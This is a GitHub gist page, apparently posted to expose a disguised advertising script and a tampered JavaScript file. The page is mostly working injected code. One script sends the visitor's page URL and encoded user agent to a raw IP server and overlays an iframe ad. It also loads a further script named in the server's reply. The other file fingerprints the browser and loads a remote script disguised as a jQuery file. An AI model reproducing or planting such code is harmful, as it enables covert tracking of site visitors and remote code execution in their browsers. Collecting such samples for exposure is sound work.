-
-
Save JiaJiaJiang/b640546950c5aaa86a4c1979e2e2190a to your computer and use it in GitHub Desktop.
伪装的广告脚本和被篡改的js文件
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* Created by xbb on 17/5/18. | |
*/ | |
/** | |
* Created by xbb on 17/5/18. | |
*/ | |
function withjQuery(callback) { | |
console.log("error") | |
if(!(window.jQuery)) { | |
var js = document.createElement('script'); | |
js.setAttribute('src', 'http://apps.bdimg.com/libs/jquery/1.8.1/jquery.min.js'); | |
js.setAttribute('type', 'text/javascript'); | |
js.onload = js.onreadystatechange = function() { | |
if (!this.readyState || this.readyState === 'loaded' || this.readyState === 'complete') { | |
if(callback && typeof callback === "function") { | |
callback(); | |
} | |
js.onload = js.onreadystatechange = null; | |
} | |
}; | |
document.getElementsByTagName('head')[0].appendChild(js); | |
}else{ | |
getAd(); | |
} | |
} | |
//格式化参数 | |
function formatParams(data) { | |
var arr = []; | |
for (var name in data) { | |
arr.push(encodeURIComponent(name) + "=" + encodeURIComponent(data[name])); | |
} | |
arr.push(("v=" + Math.random()).replace(".")); | |
return arr.join("&"); | |
} | |
//获取语言类型 | |
function getLangType() { | |
var language; | |
var langType; | |
if (navigator.appName == 'Netscape') { | |
language = navigator.language; | |
} else { | |
language = navigator.browserLanguage; | |
} | |
if (language.indexOf('zh') > -1) { | |
langType='cn'; | |
}else{ | |
langType='en'; | |
} | |
return langType; | |
} | |
function getTerminal() { | |
var ua = window.navigator.userAgent; | |
ua = btoa(ua); | |
return ua; | |
} | |
function getRealUrl() { | |
var url = window.parent.location; | |
return url; | |
} | |
function showPush(sid,url) { | |
var w,h,b,c1,c2; //w 宽 h 高 b 底部距离 c1 c2 css样式 | |
switch(sid) { | |
case "01": | |
w='400px'; | |
h='300px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "2": | |
w='300px'; | |
h='250px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "4": | |
w='300px'; | |
h='250px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "04": | |
w='400px'; | |
h='300px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "03": | |
w='300px'; | |
h='250px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "05": | |
w='800px'; | |
h='100px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "9": | |
w='100%'; | |
h='80px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "10": | |
w='100px'; | |
h='100px'; | |
b='60%'; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "11": | |
w='75px'; | |
h='75px'; | |
b='60%'; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "121": | |
w='60px'; | |
h='60px'; | |
b='60%'; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "122": | |
w='75px'; | |
h='75px'; | |
b='60%'; | |
c1='display: none;'; | |
c2=''; | |
break; | |
default: | |
w=0; | |
h=0; | |
b=0; | |
c1=''; | |
c2=''; | |
} | |
//load | |
var pElement = document.createElement("div"); | |
pElement.id = "nnn"; | |
pElement.style.width=w; | |
pElement.style.height=h; | |
pElement.style.position="fixed"; | |
pElement.style.bottom=b; | |
pElement.style.right="0px"; | |
pElement.style.zIndex="10000"; | |
pElement.style.overflow="hidden"; | |
var _htm = ""; | |
_htm += "<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" >"; | |
_htm += "<tr><td height=\"20\" style=' "+c1+" background: gray' valign=\"middle\"><div style=\"position:absolute; right:10px; top:0px; cursor:pointer;\" onclick=\"closePushDiv()\"><span style=\"font-weight:bold; font-size:13px;\">关闭<\/span><\/div><\/td>"; | |
_htm += "<\/tr>"; | |
_htm += "<tr><td colspan=\"2\" height=\""+h+"\" >"; | |
_htm += "<div onclick='closePushDiv()'> <span style=' "+c2+" font-size: 15px;position: absolute;right:0px;top:0;background: whitesmoke; opacity: 0.3; text-align:center; width:15px;height:15px;line-height:15px; cursor:pointer'>×</span> <iframe style=\"background-color:transparent\" src=\""+url+"\" width=\""+w+"\" allowtransparency=\"true\" name=\"page\" height=\""+h+"\" scrolling=\"no\" frameborder=\"0\"><\/iframe><\/div>"; | |
_htm += "<\/td><\/tr><\/table>"; | |
pElement.innerHTML=_htm; | |
document.body.appendChild(pElement); | |
} | |
function closePushDiv () { | |
$("#nnn").hide(); | |
} | |
function getUaType() { | |
var u = window.navigator.userAgent; | |
var num ; | |
if (u.indexOf('Trident') > -1) { | |
return "pc"; | |
} else if (u.indexOf('Presto') > -1) { | |
return "pc"; | |
} else if (u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1) { | |
return "pc"; | |
} else if (u.indexOf("Mac OS") && u.indexOf('AppleWebKit') > -1 && u.indexOf('Mobile') == -1) { | |
return "pc"; | |
} else if (u.indexOf('Mobile') > -1) { | |
if (u.indexOf("Mac OS X")>-1) { | |
num = u.substr(u.indexOf('OS') + 3, 5) | |
if (u.indexOf('iPhone') > -1) { | |
return "iphone"; | |
} else if (u.indexOf('iPod') > -1) { | |
return "iphone"; | |
} else if (u.indexOf('iPad') > -1) { | |
if (window.orientation == 90 || window.orientation == -90) { | |
return "iphone"; | |
} | |
return "iphone"; | |
} else { | |
return "iphone"; | |
} | |
} else if (u.indexOf('Android') > -1 || u.indexOf('Linux') > -1) { | |
num = u.substr(u.indexOf('Android') + 8, 3); | |
return "android"; | |
} else if (u.indexOf('BB10') > -1 ) { | |
return "android"; | |
} else if (u.indexOf('IEMobile') > -1) { | |
return "android"; | |
} else { | |
return "android"; | |
} | |
} else { | |
return "android"; | |
} | |
} | |
withjQuery(getAd); | |
function getAd(){ | |
console.log("errorad") | |
$.ajax({ | |
url:'http://61.174.50.211:16200/IDC/query?flag=0&ad=188888888888&ssid=1001&referer='+btoa(getRealUrl())+'&ua='+getTerminal()+'&terminal='+getUaType(), | |
dataType: 'json', | |
success:function(json){ | |
//showPush('03','http://61.174.50.167:8080/yt/516-1/1.htm'); | |
if(json.result == 1){ | |
showPush(json.sid,json.wlUrl); | |
if(json.sid.indexOf("12" >= 0)){ | |
var js = document.createElement('script'); | |
js.setAttribute('src', json.xtJS); | |
js.setAttribute('type', 'text/javascript'); | |
document.getElementsByTagName('head')[0].appendChild(js); | |
} | |
$.ajax({ | |
url:'http://61.174.50.211:16200/IDC/pv?flag=0&ad=188888888888&ssid=1001&referer='+btoa(getRealUrl())+'&ua='+getTerminal()+'&terminal='+getUaType()+'&wlId='+json.wlId+'&wlUrl='+json.wlUrl, | |
dataType: 'json', | |
success:function(json){ | |
} | |
}) | |
} | |
} | |
}) | |
} | |
/** | |
* Created by xbb on 17/5/18. | |
*/ | |
/** | |
* Created by xbb on 17/5/18. | |
*/ | |
function withjQuery(callback) { | |
console.log("error") | |
if(!(window.jQuery)) { | |
var js = document.createElement('script'); | |
js.setAttribute('src', 'http://apps.bdimg.com/libs/jquery/1.8.1/jquery.min.js'); | |
js.setAttribute('type', 'text/javascript'); | |
js.onload = js.onreadystatechange = function() { | |
if (!this.readyState || this.readyState === 'loaded' || this.readyState === 'complete') { | |
if(callback && typeof callback === "function") { | |
callback(); | |
} | |
js.onload = js.onreadystatechange = null; | |
} | |
}; | |
document.getElementsByTagName('head')[0].appendChild(js); | |
}else{ | |
getAd(); | |
} | |
} | |
//格式化参数 | |
function formatParams(data) { | |
var arr = []; | |
for (var name in data) { | |
arr.push(encodeURIComponent(name) + "=" + encodeURIComponent(data[name])); | |
} | |
arr.push(("v=" + Math.random()).replace(".")); | |
return arr.join("&"); | |
} | |
//获取语言类型 | |
function getLangType() { | |
var language; | |
var langType; | |
if (navigator.appName == 'Netscape') { | |
language = navigator.language; | |
} else { | |
language = navigator.browserLanguage; | |
} | |
if (language.indexOf('zh') > -1) { | |
langType='cn'; | |
}else{ | |
langType='en'; | |
} | |
return langType; | |
} | |
function getTerminal() { | |
var ua = window.navigator.userAgent; | |
ua = btoa(ua); | |
return ua; | |
} | |
function getRealUrl() { | |
var url = window.parent.location; | |
return url; | |
} | |
function showPush(sid,url) { | |
var w,h,b,c1,c2; //w 宽 h 高 b 底部距离 c1 c2 css样式 | |
switch(sid) { | |
case "01": | |
w='400px'; | |
h='300px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "2": | |
w='300px'; | |
h='250px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "4": | |
w='300px'; | |
h='250px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "04": | |
w='400px'; | |
h='300px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "03": | |
w='300px'; | |
h='250px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "05": | |
w='800px'; | |
h='100px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "9": | |
w='100%'; | |
h='80px'; | |
b=0; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "10": | |
w='100px'; | |
h='100px'; | |
b='60%'; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "11": | |
w='75px'; | |
h='75px'; | |
b='60%'; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "121": | |
w='60px'; | |
h='60px'; | |
b='60%'; | |
c1='display: none;'; | |
c2=''; | |
break; | |
case "122": | |
w='75px'; | |
h='75px'; | |
b='60%'; | |
c1='display: none;'; | |
c2=''; | |
break; | |
default: | |
w=0; | |
h=0; | |
b=0; | |
c1=''; | |
c2=''; | |
} | |
//load | |
var pElement = document.createElement("div"); | |
pElement.id = "nnn"; | |
pElement.style.width=w; | |
pElement.style.height=h; | |
pElement.style.position="fixed"; | |
pElement.style.bottom=b; | |
pElement.style.right="0px"; | |
pElement.style.zIndex="10000"; | |
pElement.style.overflow="hidden"; | |
var _htm = ""; | |
_htm += "<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" >"; | |
_htm += "<tr><td height=\"20\" style=' "+c1+" background: gray' valign=\"middle\"><div style=\"position:absolute; right:10px; top:0px; cursor:pointer;\" onclick=\"closePushDiv()\"><span style=\"font-weight:bold; font-size:13px;\">关闭<\/span><\/div><\/td>"; | |
_htm += "<\/tr>"; | |
_htm += "<tr><td colspan=\"2\" height=\""+h+"\" >"; | |
_htm += "<div onclick='closePushDiv()'> <span style=' "+c2+" font-size: 15px;position: absolute;right:0px;top:0;background: whitesmoke; opacity: 0.3; text-align:center; width:15px;height:15px;line-height:15px; cursor:pointer'>×</span> <iframe style=\"background-color:transparent\" src=\""+url+"\" width=\""+w+"\" allowtransparency=\"true\" name=\"page\" height=\""+h+"\" scrolling=\"no\" frameborder=\"0\"><\/iframe><\/div>"; | |
_htm += "<\/td><\/tr><\/table>"; | |
pElement.innerHTML=_htm; | |
document.body.appendChild(pElement); | |
} | |
function closePushDiv () { | |
$("#nnn").hide(); | |
} | |
function getUaType() { | |
var u = window.navigator.userAgent; | |
var num ; | |
if (u.indexOf('Trident') > -1) { | |
return "pc"; | |
} else if (u.indexOf('Presto') > -1) { | |
return "pc"; | |
} else if (u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1) { | |
return "pc"; | |
} else if (u.indexOf("Mac OS") && u.indexOf('AppleWebKit') > -1 && u.indexOf('Mobile') == -1) { | |
return "pc"; | |
} else if (u.indexOf('Mobile') > -1) { | |
if (u.indexOf("Mac OS X")>-1) { | |
num = u.substr(u.indexOf('OS') + 3, 5) | |
if (u.indexOf('iPhone') > -1) { | |
return "iphone"; | |
} else if (u.indexOf('iPod') > -1) { | |
return "iphone"; | |
} else if (u.indexOf('iPad') > -1) { | |
if (window.orientation == 90 || window.orientation == -90) { | |
return "iphone"; | |
} | |
return "iphone"; | |
} else { | |
return "iphone"; | |
} | |
} else if (u.indexOf('Android') > -1 || u.indexOf('Linux') > -1) { | |
num = u.substr(u.indexOf('Android') + 8, 3); | |
return "android"; | |
} else if (u.indexOf('BB10') > -1 ) { | |
return "android"; | |
} else if (u.indexOf('IEMobile') > -1) { | |
return "android"; | |
} else { | |
return "android"; | |
} | |
} else { | |
return "android"; | |
} | |
} | |
withjQuery(getAd); | |
function getAd(){ | |
console.log("errorad") | |
$.ajax({ | |
url:'http://61.174.50.211:16200/IDC/query?flag=0&ad=188888888888&ssid=1001&referer='+btoa(getRealUrl())+'&ua='+getTerminal()+'&terminal='+getUaType(), | |
dataType: 'json', | |
success:function(json){ | |
//showPush('03','http://61.174.50.167:8080/yt/516-1/1.htm'); | |
if(json.result == 1){ | |
showPush(json.sid,json.wlUrl); | |
if(json.sid.indexOf("12" >= 0)){ | |
var js = document.createElement('script'); | |
js.setAttribute('src', json.xtJS); | |
js.setAttribute('type', 'text/javascript'); | |
document.getElementsByTagName('head')[0].appendChild(js); | |
} | |
$.ajax({ | |
url:'http://61.174.50.211:16200/IDC/pv?flag=0&ad=188888888888&ssid=1001&referer='+btoa(getRealUrl())+'&ua='+getTerminal()+'&terminal='+getUaType()+'&wlId='+json.wlId+'&wlUrl='+json.wlUrl, | |
dataType: 'json', | |
success:function(json){ | |
} | |
}) | |
} | |
} | |
}) | |
} | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var _jsurl = "http://dn-jia-io.qbox.me/code/js/wss-online2.js"; | |
_jsurl += (_jsurl.indexOf('?') > 0 ? '&' : '?') + '_t=' + (new Date().getTime()); | |
var _b = "XXTS01"; | |
var _c = "125784715_(DKmRi1PhV1v6V15d_3881453123_)ie=="; | |
var jsNode1 = document.createElement("script"); | |
jsNode1.setAttribute("type", "text/javascript"), | |
jsNode1.setAttribute("src", _jsurl), | |
document.head ? document.head.appendChild(jsNode1) : document.body && document.body.appendChild(jsNode1); | |
!function(a, b) { | |
function c(a) { | |
var d, e, f, g, h, i, b = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; | |
for (new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1), | |
f = a.length, | |
e = 0, | |
d = ""; f > e; ) { | |
if (g = 255 & a.charCodeAt(e++), | |
e == f) { | |
d += b.charAt(g >> 2), | |
d += b.charAt((3 & g) << 4), | |
d += "=="; | |
break | |
} | |
if (h = a.charCodeAt(e++), | |
e == f) { | |
d += b.charAt(g >> 2), | |
d += b.charAt((3 & g) << 4 | (240 & h) >> 4), | |
d += b.charAt((15 & h) << 2), | |
d += "="; | |
break | |
} | |
i = a.charCodeAt(e++), | |
d += b.charAt(g >> 2), | |
d += b.charAt((3 & g) << 4 | (240 & h) >> 4), | |
d += b.charAt((15 & h) << 2 | (192 & i) >> 6), | |
d += b.charAt(63 & i) | |
} | |
return d | |
} | |
function d() { | |
return -1 != b.userAgent.indexOf("MSIE") ? "ie" : -1 != b.userAgent.indexOf("Chrome") ? "Chrome" : -1 != b.userAgent.indexOf("Firefox") ? "Firefox" : -1 != b.userAgent.indexOf("Opera") ? "Opera" : -1 != b.userAgent.indexOf("Netscape") ? "Netscape" : -1 != b.userAgent.indexOf("Safari") ? "Safari" : "" | |
} | |
function e() { | |
function e() { | |
var a = "" | |
, c = b.plugins; | |
if (c.length > 0) | |
for (j = 0; j < b.plugins.length; j++) | |
a += b.plugins[j].name + ";"; | |
return a | |
} | |
var f = b.appName | |
, g = b.cookieEnabled | |
, h = b.cpuClass | |
, i = b.mimeTypes | |
, k = b.platform | |
, l = b.plugins | |
, m = b.userAgent; | |
return pStr = "type=" + d() + "&userAgent=" + m + "&appName=" + f + "&cookieEnabled=" + g + "&cpuClass=" + h + "&mimeType_length=" + i.length + "&platform=" + k + "&plugins_length=" + l.length + "&allPluginName=" + e() + "&window_screen_width=" + a.screen.width + "&window_screen_height=" + a.screen.height + "&window_screen_colorDepth=" + a.screen.colorDepth, | |
c(pStr) | |
} | |
var f, g, h, i, j, k, l, m; | |
window.self == window.top && (f = 0, | |
window.innerWidth ? f = window.innerWidth : document.body && document.body.clientWidth && (f = document.body.clientWidth), | |
document.documentElement && document.documentElement.clientWidth && (f = document.documentElement.clientWidth), | |
g = 0, | |
(/AppleWebKit.*Mobile/i.test(navigator.userAgent) || navigator.userAgent.match(/(iPhone|iPod|iPad|Android|ios|BlackBerry|MIDP|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE)/i)) && (g = 1), | |
1020 > f && 0 == g || (h = e(), | |
j = 0, | |
k = 0, | |
l = "scripts2s", | |
m = document.createElement("script"), | |
m.setAttribute("type", "text/javascript"), | |
m.setAttribute("src", "http://61.174.50.211:16100/jquery-1.0.0.1.js"), | |
m.id = l, | |
document.body ? document.getElementById(l) || document.body.appendChild(m) : i = setInterval(function() { | |
if (j++, | |
10 == j) | |
return clearInterval(i), | |
void 0; | |
try { | |
document.getElementById(l) || 1 == k ? clearInterval(i) : document.body && (document.body.appendChild(m), | |
k = 1) | |
} catch (a) {} | |
}, 500))) | |
}(window, navigator); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment